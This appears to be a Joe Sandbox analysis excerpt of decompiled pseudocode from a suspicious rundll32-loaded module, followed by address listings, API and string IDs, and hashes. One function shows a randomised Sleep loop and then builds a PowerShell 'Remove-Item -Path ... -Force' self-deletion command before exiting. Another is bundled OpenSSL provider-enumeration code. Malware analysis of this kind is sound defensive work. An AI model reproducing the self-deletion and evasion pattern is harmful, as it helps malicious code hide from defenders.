				0xf310ba8c();
				 *((long long*)(_t988 + 0x28)) = 0xf;
				r15d = 0;
				 *(_t988 + 0x20) = 0xf31b0230;
				 *((intOrPtr*)(_t988 + 0x10)) = r15b;
				_t979 = _t978 + 0x70;
				if (_t979 != _t1033) goto 0xf2fea280;
				r8d = E0000021E21EF3111C60(_t764);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				Sleep(??);
				if ( *(_t988 + 0xd8) == 0) goto 0xf2fea6cd;
				_t473 = E0000021E21EF2FEB260(0x28c1979 * r8d, _t791,  *(_t988 + 0xd8));
				0xf3111fb0();
				0xf310bdc8();
				E0000021E21EF2FE6100(E0000021E21EF2FE6100(_t473, r8d * 0x3e8, _t989 + 0x70), r8d * 0x3e8, _t988 - 0x50);
				goto 0xf2fe9742;
				r8d = E0000021E21EF3111C60(_t764);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t527 = r8d * 0x3e8;
				Sleep(??);
				if ( *(_t988 + 0xd8) == 0) goto 0xf2fea74a;
				E0000021E21EF2FEB260(0x28c1979 * r8d, _t791,  *(_t988 + 0xd8));
				0xf3111fb0();
				0xf310bdc8();
				_t765 =  *((intOrPtr*)(_t988 - 0x78));
				if (_t765 - 0x10 < 0) goto 0xf2fea7bb;
				_t893 =  *((intOrPtr*)(_t989 + 0x70));
				if (_t765 + 1 - _t979 < 0) goto 0xf2fea7b6;
				if ((_t527 & 0x0000001f) != 0) goto 0xf2feada7;
				_t767 =  *((intOrPtr*)(_t893 - 8));
				if (_t767 - _t893 >= 0) goto 0xf2feada1;
				_t894 = _t893 - _t767;
				if (_t894 - 8 < 0) goto 0xf2fead9b;
				if (_t894 - 0x27 > 0) goto 0xf2fead95;
				0xf310ba8c();
				 *((long long*)(_t988 - 0x78)) = 0xf;
				 *(_t988 - 0x80) = 0xf31b0230;
				 *((char*)(_t989 + 0x70)) = 0;
				_t768 =  *((intOrPtr*)(_t988 - 0x38));
				if (_t768 - 0x10 < 0) goto 0xf2fe98ee;
				_t896 =  *((intOrPtr*)(_t988 - 0x50));
				if (_t768 + 1 - _t979 < 0) goto 0xf2fe98e9;
				if ((_t527 & 0x0000001f) != 0) goto 0xf2feadbf;
				_t770 =  *((intOrPtr*)(_t896 - 8));
				if (_t770 - _t896 >= 0) goto 0xf2feadb9;
				_t897 = _t896 - _t770;
				if (_t897 - 8 < 0) goto 0xf2feadb3;
				if (_t897 - 0x27 > 0) goto 0xf2feadad;
				goto 0xf2fe98e6;
				r8d = E0000021E21EF3111C60(_t770);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				Sleep(??);
				goto 0xf2fe9742;
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("int3");
				0xf3111be8();
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp+0x2f0], xmm0");
				 *((long long*)(_t988 + 0x300)) = 0xf31b0230;
				r13d =  ==  ? r12d : r13d;
				 *((intOrPtr*)(_t979 + 0x68)) = r13d;
				E0000021E21EF2FEAF10(0x28c1979 * r8d, _t791, _t988 + 0x2f0, _t979);
				 *((long long*)(_t989 + 0x20)) = _t988 + 0x2f0;
				0xf3014e20();
				_t772 = _t988 + 0x50;
				 *((long long*)(_t989 + 0x20)) = _t988 + 0x50;
				E0000021E21EF2FE6100(E0000021E21EF2FF5CD0(_t447 - "dij" + "dij" * 2, r8d * 0x3e8, 0x28c1979 * r8d >> 0x20 >> 1, 0x1000, 0x28c1979 * r8d - 3, _t791, _t988 - 0x70, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t988 + 0x120)), _t987, _t988, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t988 + 0x120)) + 0x20, _t988 + 0x440), r8d * 0x3e8, _t988 - 0x70);
				 *((long long*)(_t988 - 8)) = 0xf31b0230;
				 *_t988 = 0xf31b0230;
				 *_t988 = 0xf;
				 *((long long*)(_t988 - 8)) = 0xf31b0230;
				 *((char*)(_t988 - 0x18)) = 0;
				r8d = 0;
				E0000021E21EF2FE6530(_t791, _t988 - 0x18, _t988 + 0x138, _t979, _t987, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t988 + 0x120)) + 0x20, _t988 + 0x00000440 | 0xffffffff);
				 *((long long*)(_t989 + 0x60)) = 0xf31b0230;
				 *((long long*)(_t989 + 0x68)) = 0xf31b0230;
				 *((long long*)(_t989 + 0x68)) = 0xf;
				 *((long long*)(_t989 + 0x60)) = 0xf31b0230;
				 *((char*)(_t989 + 0x50)) = 0;
				r8d = 0xa;
				E0000021E21EF2FE6400(_t791, _t989 + 0x50, "powershell", _t987, ( *0xf320b298 << 6) +  *((intOrPtr*)(_t988 + 0x120)) + 0x20);
				GetCurrentProcessId();
				E0000021E21EF2FE9020(_t988 + 0x2d0);
				E0000021E21EF2FEB660(_t988 + 0x50, _t988 - 0x70, _t988 + 0x50);
				r8d = r8d ^ r8d;
				E0000021E21EF2FE6100(E0000021E21EF2FE6100(E0000021E21EF2FE82C0(_t791, _t989 + 0x50, _t988 + 0x50, _t979, _t987, _t988, _t988 + 0x50, _t988 + 0x00000440 | 0xffffffffffffffff), r8d * 0x3e8, _t988 - 0x70), r8d * 0x3e8, _t988 + 0x2d0);
				r8d = 0x15;
				E0000021E21EF2FE8170(_t791, _t989 + 0x50, "; Remove-Item -Path \"", _t979, _t988, _t772);
				r8d = 0;
				E0000021E21EF2FE82C0(_t791, _t989 + 0x50, _t988 - 0x18, _t979, _t987, _t988, _t772, _t988 + 0x00000440 | 0xffffffffffffffff);
				r8d = 8;
				E0000021E21EF2FE8170(_t791, _t989 + 0x50, "\" -Force", _t979, _t988, _t772);
				E0000021E21EF2FE8170(_t791, _t989 + 0x50, "\"", _t979, _t988, _t1027);
				_t914 =  >=  ?  *((void*)(_t989 + 0x50)) : _t989 + 0x50;
				0xf301c460();
				__imp__CoUninitialize();
				ExitProcess(??);
			}







































































































                                        0x21ef2fe981e
                                        0x21ef2fe9831
                                        0x21ef2fe9834
                                        0x21ef2fe9838
                                        0x21ef2fe983f
                                        0x21ef2fe9846
                                        0x21ef2fe984e
                                        0x21ef2fe9853
                                        0x21ef2fe985b
                                        0x21ef2fe9860
                                        0x21ef2fe9866
                                        0x21ef2fe986d
                                        0x21ef2fe9873
                                        0x21ef2fe987a
                                        0x21ef2fe9884
                                        0x21ef2fe988d
                                        0x21ef2fe9892
                                        0x21ef2fe989a
                                        0x21ef2fe989e
                                        0x21ef2fe98a3
                                        0x21ef2fe98ab
                                        0x21ef2fe98ad
                                        0x21ef2fe98b7
                                        0x21ef2fe98bc
                                        0x21ef2fe98c2
                                        0x21ef2fe98c9
                                        0x21ef2fe98cf
                                        0x21ef2fe98d6
                                        0x21ef2fe98e0
                                        0x21ef2fe98e9
                                        0x21ef2fe98ee
                                        0x21ef2fe98f6
                                        0x21ef2fe98fa
                                        0x21ef2fe98fe
                                        0x21ef2fe9908
                                        0x21ef2fe9913
                                        0x21ef2fe9918
                                        0x21ef2fe9923
                                        0x21ef2fe9933
                                        0x21ef2fe9939
                                        0x21ef2fe9951
                                        0x21ef2fe9958
                                        0x21ef2fe995f
                                        0x21ef2fe9966
                                        0x21ef2fe996e
                                        0x21ef2fe9971
                                        0x21ef2fe9979
                                        0x21ef2fe997c
                                        0x21ef2fe9984
                                        0x21ef2fe998c
                                        0x21ef2fe9993
                                        0x21ef2fe999e
                                        0x21ef2fe99a5
                                        0x21ef2fe99b3
                                        0x21ef2fe99b8
                                        0x21ef2fe99bd
                                        0x21ef2fe99c4
                                        0x21ef2fe99c7
                                        0x21ef2fe99cf
                                        0x21ef2fe99d3
                                        0x21ef2fe99d7
                                        0x21ef2fe99db
                                        0x21ef2fe99e2
                                        0x21ef2fe99f3
                                        0x21ef2fe99f9
                                        0x21ef2fe9a00
                                        0x21ef2fe9a0a
                                        0x21ef2fe9a15
                                        0x21ef2fe9a28
                                        0x21ef2fe9a2b
                                        0x21ef2fe9a2f
                                        0x21ef2fe9a36
                                        0x21ef2fe9a47
                                        0x21ef2fe9a49
                                        0x21ef2fe9a56
                                        0x21ef2fe9a65
                                        0x21ef2fe9a6b
                                        0x21ef2fe9a73
                                        0x21ef2fe9a78
                                        0x21ef2fe9a80
                                        0x21ef2fe9a85
                                        0x21ef2fe9a8b
                                        0x21ef2fe9a92
                                        0x21ef2fe9a98
                                        0x21ef2fe9a9f
                                        0x21ef2fe9aa9
                                        0x21ef2fe9ab2
                                        0x21ef2fe9ab7
                                        0x21ef2fe9abf
                                        0x21ef2fe9ac3
                                        0x21ef2fe9ac8
                                        0x21ef2fe9ad0
                                        0x21ef2fe9ad6
                                        0x21ef2fe9ae0
                                        0x21ef2fe9ae9
                                        0x21ef2fe9aef
                                        0x21ef2fe9af6
                                        0x21ef2fe9afc
                                        0x21ef2fe9b03
                                        0x21ef2fe9b0d
                                        0x21ef2fe9b13
                                        0x21ef2fe9b18
                                        0x21ef2fe9b1c
                                        0x21ef2fe9b1f
                                        0x21ef2fe9b23
                                        0x21ef2fe9b2a
                                        0x21ef2fe9b47
                                        0x21ef2fe9b4c
                                        0x21ef2fe9b50
                                        0x21ef2fe9b57
                                        0x21ef2fe9b59
                                        0x21ef2fe9b5c
                                        0x21ef2fe9b68
                                        0x21ef2fe9b89
                                        0x21ef2fe9b8c
                                        0x21ef2fe9b96
                                        0x21ef2fe9b9d
                                        0x21ef2fe9ba4
                                        0x21ef2fe9bac
                                        0x21ef2fe9bb0
                                        0x21ef2fe9bb4
                                        0x21ef2fe9bbd
                                        0x21ef2fe9bd9
                                        0x21ef2fe9bdc
                                        0x21ef2fe9be0
                                        0x21ef2fe9bf2
                                        0x21ef2fe9bf8
                                        0x21ef2fe9bfb
                                        0x21ef2fe9c13
                                        0x21ef2fe9c16
                                        0x21ef2fe9c20
                                        0x21ef2fe9c27
                                        0x21ef2fe9c2e
                                        0x21ef2fe9c36
                                        0x21ef2fe9c3e
                                        0x21ef2fe9c42
                                        0x21ef2fe9c4b
                                        0x21ef2fe9c67
                                        0x21ef2fe9c6a
                                        0x21ef2fe9c6e
                                        0x21ef2fe9c80
                                        0x21ef2fe9c8b
                                        0x21ef2fe9c93
                                        0x21ef2fe9c97
                                        0x21ef2fe9c9b
                                        0x21ef2fe9cb0
                                        0x21ef2fe9cb4
                                        0x21ef2fe9cd6
                                        0x21ef2fe9cdb
                                        0x21ef2fe9cf0
                                        0x21ef2fe9cf3
                                        0x21ef2fe9cfa
                                        0x21ef2fe9d00
                                        0x21ef2fe9d09
                                        0x21ef2fe9d12
                                        0x21ef2fe9d19
                                        0x21ef2fe9d20
                                        0x21ef2fe9d2b
                                        0x21ef2fe9d32
                                        0x21ef2fe9d38
                                        0x21ef2fe9d3f
                                        0x21ef2fe9d46
                                        0x21ef2fe9d51
                                        0x21ef2fe9d58
                                        0x21ef2fe9d5e
                                        0x21ef2fe9d65
                                        0x21ef2fe9d6c
                                        0x21ef2fe9d77
                                        0x21ef2fe9d7e
                                        0x21ef2fe9d89
                                        0x21ef2fe9d99
                                        0x21ef2fe9d9c
                                        0x21ef2fe9d9f
                                        0x21ef2fe9db0
                                        0x21ef2fe9db8
                                        0x21ef2fe9dc0
                                        0x21ef2fe9dc7
                                        0x21ef2fe9dd3
                                        0x21ef2fe9df5
                                        0x21ef2fe9df8
                                        0x21ef2fe9dff
                                        0x21ef2fe9e13
                                        0x21ef2fe9e1e
                                        0x21ef2fe9e24
                                        0x21ef2fe9e2a
                                        0x21ef2fe9e2c
                                        0x21ef2fe9e2f
                                        0x21ef2fe9e3d
                                        0x21ef2fe9e49
                                        0x21ef2fe9e58
                                        0x21ef2fe9e5b
                                        0x21ef2fe9e5e
                                        0x21ef2fe9e6f
                                        0x21ef2fe9e77
                                        0x21ef2fe9e7f
                                        0x21ef2fe9e86
                                        0x21ef2fe9e92
                                        0x21ef2fe9eb4
                                        0x21ef2fe9eb7
                                        0x21ef2fe9ebe
                                        0x21ef2fe9ed2
                                        0x21ef2fe9edd
                                        0x21ef2fe9ee3
                                        0x21ef2fe9ee9
                                        0x21ef2fe9eeb
                                        0x21ef2fe9eee
                                        0x21ef2fe9efc
                                        0x21ef2fe9f08
                                        0x21ef2fe9f17
                                        0x21ef2fe9f1a
                                        0x21ef2fe9f2e
                                        0x21ef2fe9f36
                                        0x21ef2fe9f3a
                                        0x21ef2fe9f41
                                        0x21ef2fe9f4d
                                        0x21ef2fe9f6f
                                        0x21ef2fe9f72
                                        0x21ef2fe9f79
                                        0x21ef2fe9f8d
                                        0x21ef2fe9f95
                                        0x21ef2fe9fa5
                                        0x21ef2fe9fa8
                                        0x21ef2fe9fab
                                        0x21ef2fe9fbc
                                        0x21ef2fe9fc4
                                        0x21ef2fe9fcc
                                        0x21ef2fe9fd3
                                        0x21ef2fe9fdf
                                        0x21ef2fea001
                                        0x21ef2fea004
                                        0x21ef2fea00b
                                        0x21ef2fea01f
                                        0x21ef2fea02a
                                        0x21ef2fea030
                                        0x21ef2fea036
                                        0x21ef2fea038
                                        0x21ef2fea03b
                                        0x21ef2fea049
                                        0x21ef2fea055
                                        0x21ef2fea064
                                        0x21ef2fea070
                                        0x21ef2fea09e
                                        0x21ef2fea0a4
                                        0x21ef2fea0a9
                                        0x21ef2fea0b1
                                        0x21ef2fea0bc
                                        0x21ef2fea0c6
                                        0x21ef2fea0cb
                                        0x21ef2fea0d1
                                        0x21ef2fea0d7
                                        0x21ef2fea0dd
                                        0x21ef2fea0e2
                                        0x21ef2fea0e6
                                        0x21ef2fea0ea
                                        0x21ef2fea0f1
                                        0x21ef2fea0f8
                                        0x21ef2fea104
                                        0x21ef2fea10a
                                        0x21ef2fea10e
                                        0x21ef2fea133
                                        0x21ef2fea13f
                                        0x21ef2fea145
                                        0x21ef2fea14c
                                        0x21ef2fea152
                                        0x21ef2fea159
                                        0x21ef2fea162
                                        0x21ef2fea16d
                                        0x21ef2fea180
                                        0x21ef2fea183
                                        0x21ef2fea187
                                        0x21ef2fea18e
                                        0x21ef2fea19f
                                        0x21ef2fea1a1
                                        0x21ef2fea1ae
                                        0x21ef2fea1c1
                                        0x21ef2fea1c7
                                        0x21ef2fea1d4
                                        0x21ef2fea1d9
                                        0x21ef2fea1e1
                                        0x21ef2fea1e6
                                        0x21ef2fea1ec
                                        0x21ef2fea1f3
                                        0x21ef2fea1f9
                                        0x21ef2fea200
                                        0x21ef2fea20a
                                        0x21ef2fea213
                                        0x21ef2fea218
                                        0x21ef2fea220
                                        0x21ef2fea224
                                        0x21ef2fea229
                                        0x21ef2fea231
                                        0x21ef2fea237
                                        0x21ef2fea241
                                        0x21ef2fea24a
                                        0x21ef2fea250
                                        0x21ef2fea257
                                        0x21ef2fea25d
                                        0x21ef2fea264
                                        0x21ef2fea26e
                                        0x21ef2fea274
                                        0x21ef2fea279
                                        0x21ef2fea284
                                        0x21ef2fea288
                                        0x21ef2fea28e
                                        0x21ef2fea296
                                        0x21ef2fea29b
                                        0x21ef2fea2a0
                                        0x21ef2fea2ab
                                        0x21ef2fea2af
                                        0x21ef2fea2b2
                                        0x21ef2fea2c2
                                        0x21ef2fea2cc
                                        0x21ef2fea2e2
                                        0x21ef2fea2ef
                                        0x21ef2fea2f4
                                        0x21ef2fea309
                                        0x21ef2fea30c
                                        0x21ef2fea30c
                                        0x21ef2fea319
                                        0x21ef2fea32e
                                        0x21ef2fea336
                                        0x21ef2fea33d
                                        0x21ef2fea344
                                        0x21ef2fea352
                                        0x21ef2fea35e
                                        0x21ef2fea360
                                        0x21ef2fea366
                                        0x21ef2fea378
                                        0x21ef2fea37d
                                        0x21ef2fea386
                                        0x21ef2fea38b
                                        0x21ef2fea397
                                        0x21ef2fea39b
                                        0x21ef2fea39e
                                        0x21ef2fea3ae
                                        0x21ef2fea3b8
                                        0x21ef2fea3c5
                                        0x21ef2fea3d2
                                        0x21ef2fea3df
                                        0x21ef2fea3e4
                                        0x21ef2fea3f9
                                        0x21ef2fea3fc
                                        0x21ef2fea3fc
                                        0x21ef2fea409
                                        0x21ef2fea41d
                                        0x21ef2fea425
                                        0x21ef2fea42c
                                        0x21ef2fea433
                                        0x21ef2fea441
                                        0x21ef2fea44d
                                        0x21ef2fea465
                                        0x21ef2fea46a
                                        0x21ef2fea473
                                        0x21ef2fea478
                                        0x21ef2fea484
                                        0x21ef2fea488
                                        0x21ef2fea48b
                                        0x21ef2fea49b
                                        0x21ef2fea4a1
                                        0x21ef2fea4a3
                                        0x21ef2fea4a6
                                        0x21ef2fea4b3
                                        0x21ef2fea4c7
                                        0x21ef2fea4d6
                                        0x21ef2fea4db
                                        0x21ef2fea4ed
                                        0x21ef2fea4fa
                                        0x21ef2fea4ff
                                        0x21ef2fea508
                                        0x21ef2fea50d
                                        0x21ef2fea519
                                        0x21ef2fea51d
                                        0x21ef2fea520
                                        0x21ef2fea530
                                        0x21ef2fea532
                                        0x21ef2fea535
                                        0x21ef2fea53b
                                        0x21ef2fea540
                                        0x21ef2fea543
                                        0x21ef2fea545
                                        0x21ef2fea554
                                        0x21ef2fea55e
                                        0x21ef2fea563
                                        0x21ef2fea56f
                                        0x21ef2fea573
                                        0x21ef2fea576
                                        0x21ef2fea586
                                        0x21ef2fea590
                                        0x21ef2fea595
                                        0x21ef2fea59e
                                        0x21ef2fea5a3
                                        0x21ef2fea5ab
                                        0x21ef2fea5b2
                                        0x21ef2fea5c5
                                        0x21ef2fea5c8
                                        0x21ef2fea5cc
                                        0x21ef2fea5d3
                                        0x21ef2fea5de
                                        0x21ef2fea5e3
                                        0x21ef2fea5e8
                                        0x21ef2fea609
                                        0x21ef2fea610
                                        0x21ef2fea616
                                        0x21ef2fea61a
                                        0x21ef2fea61c
                                        0x21ef2fea620
                                        0x21ef2fea628
                                        0x21ef2fea62d
                                        0x21ef2fea637
                                        0x21ef2fea63c
                                        0x21ef2fea642
                                        0x21ef2fea649
                                        0x21ef2fea64f
                                        0x21ef2fea656
                                        0x21ef2fea660
                                        0x21ef2fea669
                                        0x21ef2fea66e
                                        0x21ef2fea676
                                        0x21ef2fea679
                                        0x21ef2fea67d
                                        0x21ef2fea681
                                        0x21ef2fea688
                                        0x21ef2fea693
                                        0x21ef2fea6a6
                                        0x21ef2fea6a9
                                        0x21ef2fea6b4
                                        0x21ef2fea6c5
                                        0x21ef2fea6c7
                                        0x21ef2fea6d4
                                        0x21ef2fea6e7
                                        0x21ef2fea6fc
                                        0x21ef2fea706
                                        0x21ef2fea710
                                        0x21ef2fea723
                                        0x21ef2fea726
                                        0x21ef2fea72a
                                        0x21ef2fea731
                                        0x21ef2fea742
                                        0x21ef2fea744
                                        0x21ef2fea751
                                        0x21ef2fea764
                                        0x21ef2fea76a
                                        0x21ef2fea777
                                        0x21ef2fea77c
                                        0x21ef2fea784
                                        0x21ef2fea789
                                        0x21ef2fea78f
                                        0x21ef2fea796
                                        0x21ef2fea79c
                                        0x21ef2fea7a3
                                        0x21ef2fea7ad
                                        0x21ef2fea7b6
                                        0x21ef2fea7bb
                                        0x21ef2fea7c3
                                        0x21ef2fea7c7
                                        0x21ef2fea7cc
                                        0x21ef2fea7d4
                                        0x21ef2fea7da
                                        0x21ef2fea7e4
                                        0x21ef2fea7ed
                                        0x21ef2fea7f3
                                        0x21ef2fea7fa
                                        0x21ef2fea800
                                        0x21ef2fea807
                                        0x21ef2fea811
                                        0x21ef2fea817
                                        0x21ef2fea821
                                        0x21ef2fea834
                                        0x21ef2fea837
                                        0x21ef2fea842
                                        0x21ef2fea848
                                        0x21ef2fea84d
                                        0x21ef2fea852
                                        0x21ef2fea853
                                        0x21ef2fea858
                                        0x21ef2fea859
                                        0x21ef2fea85e
                                        0x21ef2fea85f
                                        0x21ef2fea865
                                        0x21ef2fea86a
                                        0x21ef2fea86b
                                        0x21ef2fea870
                                        0x21ef2fea871
                                        0x21ef2fea876
                                        0x21ef2fea877
                                        0x21ef2fea87d
                                        0x21ef2fea882
                                        0x21ef2fea883
                                        0x21ef2fea888
                                        0x21ef2fea889
                                        0x21ef2fea88e
                                        0x21ef2fea88f
                                        0x21ef2fea895
                                        0x21ef2fea89a
                                        0x21ef2fea89b
                                        0x21ef2fea8a0
                                        0x21ef2fea8a1
                                        0x21ef2fea8a6
                                        0x21ef2fea8a7
                                        0x21ef2fea8ad
                                        0x21ef2fea8b2
                                        0x21ef2fea8b3
                                        0x21ef2fea8b8
                                        0x21ef2fea8b9
                                        0x21ef2fea8be
                                        0x21ef2fea8bf
                                        0x21ef2fea8c5
                                        0x21ef2fea8ca
                                        0x21ef2fea8cb
                                        0x21ef2fea8d0
                                        0x21ef2fea8d1
                                        0x21ef2fea8d6
                                        0x21ef2fea8d7
                                        0x21ef2fea8dd
                                        0x21ef2fea8e0
                                        0x21ef2fea8e8
                                        0x21ef2fea8f2
                                        0x21ef2fea8f6
                                        0x21ef2fea904
                                        0x21ef2fea910
                                        0x21ef2fea931
                                        0x21ef2fea94d
                                        0x21ef2fea951
                                        0x21ef2fea96a
                                        0x21ef2fea96f
                                        0x21ef2fea973
                                        0x21ef2fea977
                                        0x21ef2fea97f
                                        0x21ef2fea983
                                        0x21ef2fea98b
                                        0x21ef2fea999
                                        0x21ef2fea99f
                                        0x21ef2fea9a4
                                        0x21ef2fea9a9
                                        0x21ef2fea9b2
                                        0x21ef2fea9b7
                                        0x21ef2fea9bc
                                        0x21ef2fea9ce
                                        0x21ef2fea9d4
                                        0x21ef2fea9e3
                                        0x21ef2fea9f0
                                        0x21ef2fea9fa
                                        0x21ef2feaa1c
                                        0x21ef2feaa21
                                        0x21ef2feaa33
                                        0x21ef2feaa3c
                                        0x21ef2feaa48
                                        0x21ef2feaa4d
                                        0x21ef2feaa5f
                                        0x21ef2feaa73
                                        0x21ef2feaa83
                                        0x21ef2feaa89
                                        0x21ef2feaa8e
                                        0x21ef2feaa96

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CurrentSleep$ExitUninitialize
                                        • String ID: -Recurse"$" -Force$; Remove-Item -Path "$powershell
                                        • API String ID: 2163826473-3626569723
                                        • Opcode ID: d1f916ce357f91987c03dcee5e6566ac6c65c43ba8a4d98377edd93f11aada1b
                                        • Instruction ID: 4f9fa1c1054dee87e9def47662991e537c10bbce1e97d8400551ce81a5a5f615
                                        • Opcode Fuzzy Hash: d1f916ce357f91987c03dcee5e6566ac6c65c43ba8a4d98377edd93f11aada1b
                                        • Instruction Fuzzy Hash: D102BC32221A9685FF15BBB4CC4D3EE23B1E761354F5209129E5A16EDBEF38C586C384
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3030030 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 150encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 31%
                                        			E0000021E21EF3030030(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, long _a8, long _a16, char _a20, char _a24, signed long long _a40, long long _a48, long long _a112) {
				long _v0;
				void* __rbp;
				void* _t28;
				long _t32;
				long _t40;
				void* _t64;
				signed long long _t79;
				long _t81;
				long _t82;
				char* _t107;
				void* _t113;
				long _t128;

				_t120 = __r9;
				_t116 = __r8;
				E0000021E21EF310C220();
				_t79 =  *0xf3203000; // 0x1fc8e4a4378e
				_a40 = _t79 ^ _t113 - __rax;
				_t112 = __rcx;
				E0000021E21EF302D790(_t79 ^ _t113 - __rax, "capi_list_providers\n", __r8, __r9);
				E0000021E21EF30263F0(_t79 ^ _t113 - __rax, "Available CSPs:\n", _t116, _t120);
				r15d = 0;
				_a112 = __rbx;
				_t64 = r15d;
				_a48 = __rsi;
				asm("o16 nop [eax+eax]");
				r8d = _t64;
				_t28 = E0000021E21EF302D790(_t79 ^ _t113 - __rax, "capi_get_provname, index=%d\n", _t116, _t120);
				_t81 =  &_a20;
				r8d = 0;
				_a8 = _t81;
				_v0 = _t128;
				__imp__CryptEnumProvidersW();
				if (_t28 == 0) goto 0xf3030229;
				r8d = 0x46c;
				E0000021E21EF3025700();
				_t84 = _t81;
				if (_t81 == 0) goto 0xf30301f3;
				_t82 =  &_a20;
				r8d = 0;
				_a8 = _t82;
				_v0 = _t81;
				__imp__CryptEnumProvidersW();
				if (_t28 == 0) goto 0xf303018b;
				E0000021E21EF3030FB0(_t82, _t81);
				r8d = 0x47c;
				_t110 = _t82;
				E0000021E21EF3025750();
				if (_t82 == 0) goto 0xf303029a;
				r9d = _a16;
				E0000021E21EF302D790(_t82, "capi_get_provname, returned name=%s, type=%d\n", _t82,  &_a16);
				_v0 = _a16;
				r8d = _t64;
				E0000021E21EF30263F0(_t82, "%lu. %s, type %lu\n", _t82, _t82);
				r8d = 0x496;
				E0000021E21EF3025750();
				goto 0xf3030090;
				_t32 = GetLastError();
				r8d = 0x473;
				_t107 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
				E0000021E21EF3025750();
				if (_t32 == 0x103) goto 0xf303029a;
				if ( *0xf3209020 != 0) goto 0xf30301c9;
				 *0xf3209020 = E0000021E21EF3021CE0(_t82);
				_v0 = 0x476;
				r8d = 0x68;
				E0000021E21EF30222D0(_t34, 0x68,  *0xf3209020, _t82, _t81, _t84, _t107, _t110, _t112, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF302D9B0(_t32,  *0xf3209020, _t82, _t107);
				goto 0xf303029a;
				if ( *0xf3209020 != 0) goto 0xf3030208;
				 *0xf3209020 = E0000021E21EF3021CE0(_t82);
				_v0 = 0x46e;
				_t18 = _t107 - 0x27; // 0x41
				r8d = _t18;
				E0000021E21EF30222D0(_t38, 0x68,  *0xf3209020, _t82, _t84, _t84, _t107, _t110, _t112, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0xf303029a;
				_t40 = GetLastError();
				if (_t40 == 0x103) goto 0xf303029a;
				if ( *0xf3209020 != 0) goto 0xf303024d;
				 *0xf3209020 = E0000021E21EF3021CE0(_t82);
				_v0 = 0x468;
				r8d = 0x68;
				E0000021E21EF30222D0(_t42, 0x68,  *0xf3209020, _t82, _t84, _t84, _t107, _t110, _t112, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				r9d = _t40;
				E0000021E21EF3026420(_t82,  &_a24, _t107, "%lX", "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF3021640(2, _t82, "Error code= 0x",  &_a24, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF310C290();
				return 1;
			}















                                        0x21ef3030030
                                        0x21ef3030030
                                        0x21ef303003c
                                        0x21ef3030044
                                        0x21ef303004e
                                        0x21ef3030056
                                        0x21ef3030060
                                        0x21ef303006f
                                        0x21ef3030074
                                        0x21ef3030077
                                        0x21ef303007f
                                        0x21ef3030082
                                        0x21ef3030087
                                        0x21ef3030090
                                        0x21ef303009d
                                        0x21ef30300a2
                                        0x21ef30300a7
                                        0x21ef30300aa
                                        0x21ef30300b6
                                        0x21ef30300bd
                                        0x21ef30300c5
                                        0x21ef30300d6
                                        0x21ef30300dc
                                        0x21ef30300e1
                                        0x21ef30300e7
                                        0x21ef30300ed
                                        0x21ef30300f2
                                        0x21ef30300f5
                                        0x21ef3030101
                                        0x21ef3030108
                                        0x21ef3030110
                                        0x21ef3030115
                                        0x21ef303011a
                                        0x21ef303012a
                                        0x21ef303012d
                                        0x21ef3030135
                                        0x21ef303013b
                                        0x21ef303014d
                                        0x21ef303015d
                                        0x21ef3030167
                                        0x21ef303016a
                                        0x21ef303016f
                                        0x21ef303017f
                                        0x21ef3030186
                                        0x21ef303018b
                                        0x21ef3030191
                                        0x21ef3030197
                                        0x21ef30301a3
                                        0x21ef30301ae
                                        0x21ef30301bc
                                        0x21ef30301c3
                                        0x21ef30301ce
                                        0x21ef30301d6
                                        0x21ef30301e2
                                        0x21ef30301e9
                                        0x21ef30301ee
                                        0x21ef30301fb
                                        0x21ef3030202
                                        0x21ef303020d
                                        0x21ef303021e
                                        0x21ef303021e
                                        0x21ef3030222
                                        0x21ef3030227
                                        0x21ef3030229
                                        0x21ef3030236
                                        0x21ef3030240
                                        0x21ef3030247
                                        0x21ef3030252
                                        0x21ef303025a
                                        0x21ef3030266
                                        0x21ef303026b
                                        0x21ef303027f
                                        0x21ef3030295
                                        0x21ef30302b4
                                        0x21ef30302c3

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
